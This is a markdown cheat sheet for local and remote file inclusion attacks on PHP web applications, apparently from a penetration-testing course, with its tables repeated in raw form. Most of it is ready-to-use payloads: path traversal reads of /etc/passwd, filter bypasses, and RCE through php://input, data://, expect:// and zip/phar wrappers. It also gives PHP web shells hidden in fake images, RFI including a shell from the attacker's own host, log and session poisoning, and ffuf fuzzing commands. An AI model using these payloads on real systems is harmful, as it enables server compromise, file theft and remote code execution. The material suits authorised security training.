santosadrian/file-inclusion.md

## file-inclusion.md

      
    Raw
  

              file-inclusion.md
            
          
    Local File Inclusion


Command
Description


 Basic LFI


 /index.php?language=/etc/passwd
Basic LFI


 /index.php?language=../../../../etc/passwd
LFI with path traversal


 /index.php?language=/../../../etc/passwd
LFI with name prefix


 /index.php?language=./languages/../../../../etc/passwd
LFI with approved path


 LFI Bypasses


 /index.php?language=....//....//....//....//etc/passwd
Bypass basic path traversal filter


 /index.php?language=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
Bypass filters with URL encoding


 /index.php?language=non_existing_directory/../../../etc/passwd/./././.[./ REPEATED ~2048 times]
Bypass appended extension with path truncation (obsolete)


 /index.php?language=../../../../etc/passwd%00
Bypass appended extension with null byte (obsolete)


 /index.php?language=php://filter/read=convert.base64-encode/resource=config
Read PHP with base64 filter


Remote Code Execution


Command
Description


 PHP Wrappers


 /index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=id
RCE with data wrapper


 curl -s -X POST --data '<?php system($_GET["cmd"]); ?>' "http://<SERVER_IP>:<PORT>/index.php?language=php://input&cmd=id"
RCE with input wrapper


 curl -s "http://<SERVER_IP>:<PORT>/index.php?language=expect://id"
RCE with expect wrapper


 RFI


 echo '<?php system($_GET["cmd"]); ?>' > shell.php && python3 -m http.server <LISTENING_PORT>
Host web shell


 /index.php?language=http://<OUR_IP>:<LISTENING_PORT>/shell.php&cmd=id
Include remote PHP web shell


 LFI + Upload


 echo 'GIF8<?php system($_GET["cmd"]); ?>' > shell.gif
Create malicious image


 /index.php?language=./profile_images/shell.gif&cmd=id
RCE with malicious uploaded image


 echo '<?php system($_GET["cmd"]); ?>' > shell.php && zip shell.jpg shell.php
Create malicious zip archive 'as jpg'


 /index.php?language=zip://shell.zip%23shell.php&cmd=id
RCE with malicious uploaded zip


 php --define phar.readonly=0 shell.php && mv shell.phar shell.jpg
Create malicious phar 'as jpg'


 /index.php?language=phar://./profile_images/shell.jpg%2Fshell.txt&cmd=id
RCE with malicious uploaded phar


 Log Poisoning


 /index.php?language=/var/lib/php/sessions/sess_nhhv8i0o6ua4g88bkdl9u1fdsd
Read PHP session parameters


 /index.php?language=%3C%3Fphp%20system%28%24_GET%5B%22cmd%22%5D%29%3B%3F%3E
Poison PHP session with web shell


 /index.php?language=/var/lib/php/sessions/sess_nhhv8i0o6ua4g88bkdl9u1fdsd&cmd=id
RCE through poisoned PHP session


 curl -s "http://<SERVER_IP>:<PORT>/index.php" -A '<?php system($_GET["cmd"]); ?>'
Poison server log


 /index.php?language=/var/log/apache2/access.log&cmd=id
RCE through poisoned PHP session


Misc


Command
Description


 ffuf -w /opt/useful/SecLists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?FUZZ=value' -fs 2287
Fuzz page parameters


 ffuf -w /opt/useful/SecLists/Fuzzing/LFI/LFI-Jhaddix.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=FUZZ' -fs 2287
Fuzz LFI payloads


 ffuf -w /opt/useful/SecLists/Discovery/Web-Content/default-web-root-directory-linux.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=../../../../FUZZ/index.php' -fs 2287
Fuzz webroot path


 ffuf -w ./LFI-WordList-Linux:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=../../../../FUZZ' -fs 2287
Fuzz server configurations


 LFI Wordlists


LFI-Jhaddix.txt


Webroot path wordlist for Linux


Webroot path wordlist for Windows


Server configurations wordlist for Linux


Server configurations wordlist for Windows


File Inclusion Functions


Function
Read Content
Execute
Remote URL


PHP


include()/include_once()
✅
✅
✅


require()/require_once()
✅
✅
❌


file_get_contents()
✅
❌
✅


fopen()/file()
✅
❌
❌


NodeJS


fs.readFile()
✅
❌
❌


fs.sendFile()
✅
❌
❌


res.render()
✅
✅
❌


Java


include
✅
❌
❌


import
✅
✅
✅


.NET


@Html.Partial()
✅
❌
❌


@Html.RemotePartial()
✅
❌
✅


Response.WriteFile()
✅
❌
❌


include
✅
✅
✅
Command	Description
Basic LFI
`/index.php?language=/etc/passwd`	Basic LFI
`/index.php?language=../../../../etc/passwd`	LFI with path traversal
`/index.php?language=/../../../etc/passwd`	LFI with name prefix
`/index.php?language=./languages/../../../../etc/passwd`	LFI with approved path
LFI Bypasses
`/index.php?language=....//....//....//....//etc/passwd`	Bypass basic path traversal filter
`/index.php?language=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64`	Bypass filters with URL encoding
`/index.php?language=non_existing_directory/../../../etc/passwd/./././.[./ REPEATED ~2048 times]`	Bypass appended extension with path truncation (obsolete)
`/index.php?language=../../../../etc/passwd%00`	Bypass appended extension with null byte (obsolete)
`/index.php?language=php://filter/read=convert.base64-encode/resource=config`	Read PHP with base64 filter
Command	Description
PHP Wrappers
`/index.php?language=data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=id`	RCE with data wrapper
`curl -s -X POST --data '<?php system($_GET["cmd"]); ?>' "http://<SERVER_IP>:<PORT>/index.php?language=php://input&cmd=id"`	RCE with input wrapper
`curl -s "http://<SERVER_IP>:<PORT>/index.php?language=expect://id"`	RCE with expect wrapper
RFI
`echo '<?php system($_GET["cmd"]); ?>' > shell.php && python3 -m http.server <LISTENING_PORT>`	Host web shell
`/index.php?language=http://<OUR_IP>:<LISTENING_PORT>/shell.php&cmd=id`	Include remote PHP web shell
LFI + Upload
`echo 'GIF8<?php system($_GET["cmd"]); ?>' > shell.gif`	Create malicious image
`/index.php?language=./profile_images/shell.gif&cmd=id`	RCE with malicious uploaded image
`echo '<?php system($_GET["cmd"]); ?>' > shell.php && zip shell.jpg shell.php`	Create malicious zip archive 'as jpg'
`/index.php?language=zip://shell.zip%23shell.php&cmd=id`	RCE with malicious uploaded zip
`php --define phar.readonly=0 shell.php && mv shell.phar shell.jpg`	Create malicious phar 'as jpg'
`/index.php?language=phar://./profile_images/shell.jpg%2Fshell.txt&cmd=id`	RCE with malicious uploaded phar
Log Poisoning
`/index.php?language=/var/lib/php/sessions/sess_nhhv8i0o6ua4g88bkdl9u1fdsd`	Read PHP session parameters
`/index.php?language=%3C%3Fphp%20system%28%24_GET%5B%22cmd%22%5D%29%3B%3F%3E`	Poison PHP session with web shell
`/index.php?language=/var/lib/php/sessions/sess_nhhv8i0o6ua4g88bkdl9u1fdsd&cmd=id`	RCE through poisoned PHP session
`curl -s "http://<SERVER_IP>:<PORT>/index.php" -A '<?php system($_GET["cmd"]); ?>'`	Poison server log
`/index.php?language=/var/log/apache2/access.log&cmd=id`	RCE through poisoned PHP session
Command	Description
`ffuf -w /opt/useful/SecLists/Discovery/Web-Content/burp-parameter-names.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?FUZZ=value' -fs 2287`	Fuzz page parameters
`ffuf -w /opt/useful/SecLists/Fuzzing/LFI/LFI-Jhaddix.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=FUZZ' -fs 2287`	Fuzz LFI payloads
`ffuf -w /opt/useful/SecLists/Discovery/Web-Content/default-web-root-directory-linux.txt:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=../../../../FUZZ/index.php' -fs 2287`	Fuzz webroot path
`ffuf -w ./LFI-WordList-Linux:FUZZ -u 'http://<SERVER_IP>:<PORT>/index.php?language=../../../../FUZZ' -fs 2287`	Fuzz server configurations
LFI Wordlists
LFI-Jhaddix.txt
Webroot path wordlist for Linux
Webroot path wordlist for Windows
Server configurations wordlist for Linux
Server configurations wordlist for Windows
Function	Read Content	Execute	Remote URL
PHP
`include()`/`include_once()`	✅	✅	✅
`require()`/`require_once()`	✅	✅	❌
`file_get_contents()`	✅	❌	✅
`fopen()`/`file()`	✅	❌	❌
NodeJS
`fs.readFile()`	✅	❌	❌
`fs.sendFile()`	✅	❌	❌
`res.render()`	✅	✅	❌
Java
`include`	✅	❌	❌
`import`	✅	✅	✅
.NET
`@Html.Partial()`	✅	❌	❌
`@Html.RemotePartial()`	✅	❌	✅
`Response.WriteFile()`	✅	❌	❌
`include`	✅	✅	✅